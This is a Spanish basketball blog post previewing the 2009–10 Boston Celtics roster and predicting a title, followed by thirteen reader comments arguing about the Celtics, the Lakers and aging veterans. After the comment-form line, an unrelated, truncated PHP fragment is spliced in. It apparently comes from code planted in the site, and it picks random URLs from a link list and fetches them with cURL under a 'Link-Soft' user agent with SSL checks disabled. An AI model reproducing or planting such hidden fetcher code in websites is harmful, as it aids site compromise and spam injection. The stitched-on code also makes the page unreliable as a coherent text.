Boston Celtics: El retorno del Jedi

12 de October de 2009 por Jabho

Y a la izquierda del cuadrilátero, después de un pequeño paréntesis, con calzón verde y raya blanca el aspirante… Bostooooon Celtics!!!!!!

Visto en clave de trilogía, el ciclo en el que andan inmersos los Celtics comenzó cumpliendo de sobra las expectativas, para luego dar paso a un año complicado tanto en lo deportivo como en lo económico. En lo económico en la temporada 2008-2009 coincidía el salario máximo de Garnett con contratos altos de Pierce y Allen, lo que supuso no poder retener a Posey, clave en al anillo el año anterior, así como tener que esperar a los cortados de turno de febrero para hacerse con refuerzos a bajo precio. Llegaron Marbury y Moore, que daban el perfil buscado, y que sin hacerlo mal, tampoco fueron lo suficiente para tapar los agujeros que el barco fue haciendo. En lo deportivo quizás los refuerzos llegaran algo tarde, pero la clave fue la lesión de Garnett, fuera media temporada y los Play Offs.

Sin Garnett, y sin Powe, los Celtics jugaron la postemporada sabiéndose sin opciones al anillo. Pero fieles a su tradición de orgullo y lejos de bajar los brazos, afirmaron las piernas, apretaron los dientes y pelearon partido a partido la mejor primera ronda de Play Offs que recordamos. Cayeron, dignamente, en semifinales de conferencia, nuevamente en 7 duros partidos y ante el que luego sería finalista. No hay derrotas dulces, y menos si no logras evitar que el imperio contraataque, pero algunas te hacen más fuerte.

El primer movimiento importante de este verano lo firmó Ainge con la extensión del contrato de Garnett en el verano del 2007. Garnett ha pasado de cobrar 24$ la temporada pasada a cobrar 16$ este año y ese respiro de casi 8$ se ha traducido en Sheed, Daniels y Shelden Williams, además de retener a Big Davis. Danny Ainge ha hecho sus deberes y ha puesto en manos de Doc Rivers una de las plantillas más profundas, equilibradas y talentosas de la liga. La mejor plantilla de la liga a mi juicio.

Queda ahora en manos del entrenador que la mejor plantilla sea también el mejor equipo del campeonato. Visto los visto estos dos años y visto el perfil de las incorporaciones sólo se vislumbra una nubecilla gris en el horizonte ¿Está Kevin Garnett recuperado al 100%? Porque las aspiraciones reales de los Celtics, como las del resto de candidatos obviamente, pasan porque sus mejores jugadores estén bien. Sin él el equipo es bueno, pero no candidato. Y ha habido demasiado rumor y demasiada confirmación pública por parte suya y del equipo como para que no quede algo de duda. A Kevin no le necesitarán ahora, así que no es problema que se lo tome con calma y vuelva al 100% allá por febrero o marzo cuando los partidos empiezan a ser de verdad importantes.

De inicio Kedrick Perkins acompañará a The Big Ticket. Perkins ha mejorado año a año su aportación en pista (8-8-2 el año pasado que no está nada mal), ha mejorado su defensa y ha controlado sus problemas de faltas. Estamos ante un jugador que hará el trabajo sucio en la zona y defenderá al mejor jugador al poste contrario. Del banco saldrán Rasheed Wallace y Glen Davis. Sheed desempeñará el papel de 6º hombre aunque no tengo dudas que será quien acabe jugando los últimos minutos en partidos comprometidos. El fichaje tiene su riesgo ya que cobrará la midlevel por 3 temporadas y no hay que olvidar que tiene 35 años. Pero Wallace ha demostrado ser siempre un jugador competitivo, nada egoísta en el juego ofensivo y uno de los mejores defensores interiores de la liga. Con él subirá si cabe el nivel en defensa, y en ataque, aunque con la edad se ha ido alejando del poste bajo, es capaz de aportar e incluso liderar la 2ª unidad si es necesario. Por su parte Big Davis aprovechó la lesión de Garnett el año pasado para hacerse un hueco en el roster, en la liga y en los corazones verdes. Intenso en defensa, y aun así el peor defensor de los 4, y también en ataque, con un tiro muy sólido a 4-5 metros, buenos movimientos de pies y mucha pelea en la zona donde compensa la falta de altura con garra y, porque no decirlo, con su anchura. Detrás de ellos aun quedarían Shelden Willams y Brian Scalabrini. Shelden no ha justificado en ningún momento que los Hawks se gastarán un pick 5 con él, pero con minutos y confianza puede desempeñar un rol similar al de Perkins. Tendrá caros los minutos en Boston. Scalabrini jugará poco pero cuando lo haga seguirá peleando a pesar de su falta de atletismo y seguirá demostrando buena mano.

Todos ellos deben estar comandados por el “trash talker” Garnett. Garnett es uno de los mejores interiores de la liga, y de la historia, y le da al equipo un salto de calidad enorme en ambos lados de la cancha. Pero además es el líder espiritual de la mejor defensa del campeonato, esa que ha diseñado Tom Thibodeau y que él dirige en la cancha. Boston, con Garnett, es un equipo temible en su juego interior, agresivo y duro en defensa y muy versátil en ataque. Garnett, Sheed, Perkins, Shelden,…. Les van a adorar los pivots rivales.

El base titular seguirá siendo Rajon Rondo. La progresión de Rondo ha sido espectacular y es el mejor defensor en su posición del campeonato. En ataque aporta en todos los apartados del juego y es especialmente bueno en transiciones rápidas y penetrando a canasta. Pero además ha mejorado su tiro, por encima del 50% de 2 y del 30% de 3, y lejos de arrugarse o esconderse tras las teóricas estrellas sobresale en los partidos difíciles. Los Play Offs de la temporada pasada, en especial su duelo con Rose en primera ronda, para guardar en el recuerdo. Le suplirá como hasta ahora Eddie House que es seguro el base que peor bota la pelota de la liga. Es un jugador unidimensional que aporta tiro y poco más, pero que en Boston ha sido capaz además de pasar como un correcto defensor. Lester Hudson venido del draft tendrá complicado encontrar un hueco en el roster ni siquiera como tercer base.

En las alas seguirán Ray Allen y Paul Pierce. Ambos deberían empezar a administrar sus minutos pero no por ello dejarán de ser piedras angulares del proyecto. Ray Allen es el termómetro ofensivo de los verdes. Cuando el anota fácil, pocos partidos se escapan. Y es que en gran medida el tiro exterior del equipo está en sus manos. No es un mal plan dado que es uno de los mejores, y más elegantes, tiradores de la liga. Tiro pero también manejo del balón y conocimiento del juego en ataque. Listo para aparecer en los momentos calientes y para hacer una demostración defensiva si el partido lo requiere.

Paul Pierce es el tipo que creció en Los Angeles odiando a Bird y los suyos. Hoy también es el capitán y alma de este equipo, al que el Garden ovaciona y por cuyas manos pasa casi todo el ataque estático céltico. Un point forward en toda regla que destaca por la inteligencia con la que juega. Del banco saldrá con muchos minutos el recién llegado Marquis Daniels, otro jugador cuyo perfil va como anillo al dedo a los Celtics. Atlético, buen defensor y muy polivalente. Tony Allen, que va perdiendo credibilidad, debería completar la rotación, pero no me sorprendería que JR Giddens y, sobretodo, Bill Walter le fueran robando minutos.

El quinteto de inicio, Rondo-Allen-Pierce-Garnett-Perkins, es posiblemente el mejor y más equilibrado de la liga. Hombre a hombre puede competir con cualquiera. De igual manera el banco tiene soluciones y repuesto para casi todo. Es indudable que la edad de algunos de los principales jugadores puede ser un problema, pero también que hasta el momento no lo ha sido y que las dos últimas temporadas Boston ha gestionado sus fuerzas y sus jugadores han llegado bien a Play Offs y ahí han jugado a su mejor nivel. Nada hace pensar que no vaya a volver a ser así.

Los Celtics de Doc Rivers se han caracterizado por ser mucho más que un Big Three. Cada jugador ha encontrado su sitio y ha desempeñado un rol tan importante como su aportación le ha permitido. Rondo, Perkins o Davis han crecido y Rivers ha demostrado estos años ser capaz por un lado de manejar la plantilla y por otro de encontrar soluciones a los problemas que se han presentado. Cada jugador que ha llegado, Marbury incluido, se ha ajustado a un rol sin egos en ataque y ha defender duro. Lo que se suponía una desventaja frente a otros aspirantes (Rivers frente a Jackson o Popovich) no lo ha sido tanto.

Esta primavera mucho me temo, y espero, que volverá a ser tiempo de elegir bando. Y ante ese imperio mediático, más grande si cabe en España, que es el amarillo, unos pocos nos uniremos a la resistencia verde. Ellos son más y creen que son mejores. No importa, otras veces antes también fue así. Aun deben escocerles las heridas de la última batalla.

Quinteto inicial: Rajon Rondo, Ray Allen, Paul Pierce, Kevin Garnett y Kedrick Perkins.

Sexto hombre: Rasheed Wallace

Pronóstico: Campeones.

Comenta

13 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Jojojojo… qué fuerte llega Jabho este año.
    Francamente… yo soy de los que pensaban que las heridas de la última batalla escocían, pero después de leer este artículo y de comprobar que en el análisis de Magic no habían referencias ni pullas al eterno rival me he dado cuenta que en realidad lo que escuecen son las heridas por una batalla que no se llegó a jugar.
    Con otro anillo más en la butxaca y con un equipo que, hasta no se demuestre lo contrario, es el actual campeón y con muchas más posibilidades de perpetuarse en dinastía (y de remontar el número de campeonatos, sí) las heridas del pasado duelen mucho menos.
    Tampoco termino de ver ese símil del Jedi contra el imperio. En la película de George Lucas el Imperio eran los poderosos… precísamente los verdes que en el pasado eran capaces de tener un equipo de 8 o 9 Hall of Famers y que tienen más anillos que nadie (de momento y por poco tiempo) y los que jugaban con los límites de la legalidad en su estrella de la muerte, el vetusto garden. Los Jedi eran los buenos, los guapos, los del Show Time… que poco tenían que ver con la fea jeta del gran jefe o de McHale.

    A los Celtics ya les queda menos para vivir de rentas… se ha tratado la lesión de Garnett como la madre de todas las excusas, sin recordar apenas que los Lakers jugaban durante muchísimos minutos con Radmanovic y Turiaf en la última final que perdieron, tras haber tumbado a los Nuggets, Jazz y Spurs consecutivamente (que no eran los Hawks, ni aquellos Cavs que casi los tumban)
    También habría que hablar porqué se ha intentado por todos los medios traspasar a Rondo o a Allen… sobre todo este último que ha dado muestras demoledoras de declive durante momentos decisivos los últimos tiempos.

    Curiosamente nada se habla de Rasheed… con esos 35 tacos que lleva con la mejor de las hermosuras (porque hermoso está un par de decenas de kilos el bueno de Sheed) No sabemos si el sobrepeso le habrá endulzado el carácter, pero llama la atención que se hable sólo de lo problemático que puede ser Artest y nos olvidemos todos de lo majo que era el Jail-Blazer cuando se ponía. Igual no le sienta bien del todo ser reserva de Perkins, oye….

    Hablando en serio. Por supuesto que los Celtics me parecen un rival respetable, y el quinteto que menciona Jabho, sino es el más compensado debe de ser sin ninguna duda de los que más. También hay un buen banquillo y, para mí, uno de los cuerpos técnicos más brillantes de la liga. Sin embargo, el camino va a ser más duro que nunca. Mucho más duro que hace dos años cuando apenas tenían competencia en el Este. Este año sí es el WILD WILD EAST y ahí un equipo de veteranos de guerra puede pasar dificultades. Veremos si las ganas que ha mostrado Ainge este verano por hacer descartes no vuelven antes de tiempo.

    Si tuviera que apostar no lo haría por ellos. Seguro. Ni siquiera para llegar a la final.

      Citar

  2. Viva_Dirk dice:
    #2

    A mi Boston me crea sensaciones contradictorias:

    – Por un lado creo que tienen la mejor plantilla del Este, experiencia y un par de jugadores que pueden evolucionar mucho. Con todos a buen nivel los veo favoritos por encima de Orlando y Cleveland.

    – Por el otro está lo que dice Deer, el Este es mas fuerte que hace 2 años y van necesitar quedar muy arriba para afrontar unos play-offs con la 1ª ronda no demasiado exigente, y ese esfuerzo en la regular pueden pagarlo los Garnett, Allen, Pierce y Sheed, que tienen una media de 33 años del ala. Ahí entran Rondo, Davis, Daniels e incluso Walker, si estos jugadores dan un paso al frente y permiten reducir los minutos de los veteranos durante la regular, en play-offs podrán estar a tope.

    Me molaria otra final contra Boston con todos sanos por ambos bandos.

      Citar

  3. David dice:
    #3

    Pues yo, después de leer este artículo, tengo unas ganas tremendas de una serie de PO contra Lakers. Todos sanos, sería una batalla cojonuda, en mi opinión

      Citar

  4. Jabho dice:
    #4

    Deer: La decadencia de Allen yo no la he visto por ahora. Ha jugado partidos malos, de hecho la eliminatoria contra los Hawks de hace 2 años fue muy mala, pero no veo “muestras demoledoras de declive”… que les pregunten a los Bulls por su declive, jeje.

    Respecto a que escuece no haber peleado el último anillo ya te lo digo “no lo dudes”. A Orlando les pusimos en muchos apuros y creo que con Garnett hubieramos jugado otra final, y en ella habríais partido como favoritos…. como la vez anterior para muchos 😉

    DEl tema de Rasheed tiene su riesgo sin duda. Pero vamos, si llega a los 38 jugando como jugó PJ Brown también con 38, no problem. Más o menos riesgo que Artest… pues veremos.

    Viva: Si, si no tenemos a todos a buen nivel tampoco nos veo favoritos. Ala, por mi les rompemos una pierna a Garnett, otra a Lebron, otra a Kobe, otra a Duncan y otra a Howard…. Ya digo que sin Garnett no somos candidatos, pero vamos como los Lakers sin Kobe tampoco lo serían… EN realidad ningún equipo conserva sus aspiraciones sin su mejor jugador.

    Respecto a las dudas que generan los equipos yo creo que Boston puede crear dudas pero ¿las series contra los Rockets de los LAkers no te crean dudas?¿las mismas contra Denver? Sinceramente este año si no hay lesiones lo veo claro, es cosa de 3: Lakers, Spurs y Celtics. Alguna opción para Cavs y para mi ninguna para los Magic o cualquier otro

    Por último lo del imperio es una chorradilla, pero es que aqui la única NBA que interesa es la ÑBA y ya con Pau en los Lakers llega a ser un poco cansino. Y que no se me malinterprete, que a mi gusta Pau y me alegro de que haya ganado un anillo, pero si quieren conseguir más afición deberían ser un poco más “plurales” por decirlo de alguna manera.

      Citar

  5. M dice:
    #5

    A primera vista, parece que la confección de la plantilla este año pretende buscar que los jugadores más destacados descansen (relativamente) hasta los momentos más duros, apoyados en una batería de segundos espadas muy interesante. Parece una maniobra inteligente, que puede dificultarse si el este es tan difícil como promete este año. No sé, en mi humilde opinión, les veo en un modelo Spurs levemente modificado, oficio y sacrificio a puñados, y mucho talento atacante para resolver, aunque sea de una manera casi funcionarial. En ausencia de circunstancias excepcionales, les veo como el mejor equipo de la conferencia y finalistas, aunque no campeones, veo superiores a LA y a San Antonio, sobre todos (puede ser también que un finalista del oeste salga de la batalla victorioso pero muy muy malherido) . Ojalá puedan con todo, ánimo celtas!!! 😉

      Citar

  6. M dice:
    #6

    Y añado a Portland como un equipo que en el oeste puede esperar a alguno de esos dos con el cuchillo entre los dientes y eliminarlo, o dejarlo aún más tocado para lo que siga.

      Citar

  7. Viva_Dirk dice:
    #7

    Bueno Jabho, yo no digo necesariamente que se vaya a lesionar Garnett, digo que si tus tres jugadores mas importantes tienen una media de 33 años, tienes que cuidarlos bastante. Pierce y Allen no suelen lesionarse, pero si tienen que volver a jugar 37 minutos por partido no los veo con fuelle para eliminar luego a equipos mas jóvenes como Cleveland o Magics.

    Y la verdad es que no, no me crearon dudas los Lakers en las eliminatorias del Oeste, me cabrea un pelín que jueguen tanto con fuego, pero fueron muy solventes. Y contra un equipo de mas entidad como Orlando rindieron a tope.

      Citar

  8. TheDeerHunter dice:
    #8

    Jab, nadie en su sano juicio pudo decir que los Lakers, sin Ariza ni Bynum y con Radmanovic de titular eran favoritos en la final de hace dos años. Los Celtics fueron favoritos desde el inicio de la competición hasta el final y sólo la teórica corta plantilla, que luego se demostró no era tal y las malas series contra Atlanta y Cleveland pusieron mínimamente en duda ese favoritismo. Ahora, sín embargo, sí veo a los Lakers como los favoritos claros a todo. Igual que el año pasado.

    Sobre el tema de Allen. Podemos decírselo a los Bulls… o podemos hablar de Orlando, con 13 puntos por partido en 40 minutos de juego y unos porcentajes de tiro no muy superiores al 30%. Eso, amigo mío, son “muestras demoledoras de declive” para un futuro hall of famer como él y creo que estás de acuerdo conmigo con eso en el fondo. Sí te reconozco que la final que jugó contra los Lakers fue de lo más sorprendente que yo haya visto, pero quitando ese momento se le nota distinto a lo que él ha sido.

    Del fichaje de Rasheed. Me la juego. Son fichajes de distinta índole. Rasheed va a los Celtics a morirse como jugador… Artest viene a ser fundamental en el equipo.

      Citar

  9. Jabho dice:
    #9

    Todo debe ser cuestión de perspectiva porque lo de los Lakers es jugar con fuego y los Celtics crean dudas. De los PO de los Celtics de estos dos años puede crear duda la 1ª eliminatoria frente a los Hawks hace dos años (similar a la de los Rockets de este año por ejemplo). Luego irse a 7 partidos con Cavs es más o menos normal, y contra Pistons y Lakers fueron muuuuuu solventes.

    Este año las cosas eran distintas y Boston ha dejado una imagen muy buena, creo.

    A mi los Lakers no me crean dudas tampoco. Creo que se pueden complicar la vida alguna vez, pero vamos que si no llegan a la final será porque se habrán encontardo a los Spurs muy fuertes por el camino. Pero nada en estas dos temporadas de los Celtics da motivo para que estos creen dudas (más allá de la lesión de Garnett)

    Deer, no me hagas sacar las medias de Ray Allen de minutos, % en tiro y demás de este año pasado (o del anterior) porque si eso son “muestras demoledoras de declive” cerramos el chiringuito. Tiene malos partidos, pero vamos….

    Aun así si, creo, he dicho, que Pierce y Allen deben dosificarse para llegar bien a los Play Offs.

    Las finales de Celtcs-Lakers me las ví enteritas por el C+ y Daimiel, respetadillo y con algo de juicio, dio claros favoritos a los Lakers. Los invitados, Lavodrama creo recordar, y Carnicero y el yugoslavo también, aunque entiendo que sean opiniones menos respetadas. No fueron los únicos …

      Citar

  10. Viva_Dirk dice:
    #10

    Bueno, mi duda son los 2 años que han pasado, jeje. Para mi la única duda es la gasolina que tengan que gastar hasta entrar en play-offs, si gastan mucha y son primeros del Este habrá valido la pena porque tendrán una primera ronda muy facil y una segunda facililla salvo sorpresa.

    Es lo único que digo, que a la gente de cierta edad hay que cuidarla.

      Citar

  11. Dantley2 dice:
    #11

    Entiendo las razones de Jabho, pero personalmente confío menos este año en los Celtics, más o menos por las razones que habéis expuesto el resto. Mi pronóstico va a finalistas de conferencia o incluso quizá no. Son 3 los candaidatos del Este, LeBron, perdón Cleveland; Howard, perdón, Orlando; y Celtics. Si Orlando confirma lo del año pasado, Cavs y Magic serán 1 y 2, con lo que de momento el factor cancha (es prontísimo para eso, pero bueno) estaría en contra de Celtics que tendrán que dosificarse en la regular.

      Citar

  12. Óscar dice:
    #12

    Ahí, M, ahí te qiero ver. Por fin alguien habla de Portland como equipo serio. Lo del cuchillo entre los dientes ojalá sea así, si algo nos faltó el año pasado fue dar la talla como equipo en los momentos-clave,sobre todo lógicamente en las series vs. Houston. hacía falta experiencia, y por eso han llegado Juwan Howard, Udoka (aunque no garantizado) y sobre todo Andre Miller, la pieza imprescindible para mirar más arriba.
    En cuanto a Boston, en plantilla no es peor que nadie, pero hay que verlos como aguantan el ritmo con una media de edad tan alta. Lo de Rasheed de que van a superar el 70-12 de los Bulls… en fin, es “Sheed”.

      Citar

  13. portu dice:
    #13

    No creo q si llegan sanos a las Finales o Finales de Conferencia les falte fuelle, el banquillo es mucho más extenso q en el año del anillo, el problema radica en si llegan sanos hasta ese punto…. ante tal dilema a principios de verano creí q esta Regular Season no jugarían más de 30 mins de media los 4 jugadores veteranos (Sheed, Allen, KG y Pierce), pero viendo en preseason cómo se ha puesto a machacarse ya en pista Garnett y cómo vuelven a hacer hincapié en la defensa cada vez q hacen declaraciones (además de lo q dijo Sheed de buscar las 72 victorias) creo q van a volver a buscar encontrar su juego diariamente, sobretodo encontrar feeling de equipo a través de la defensa y todos querrán ser impòrtantes, así q creo q volverán a jugar demasiado….

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>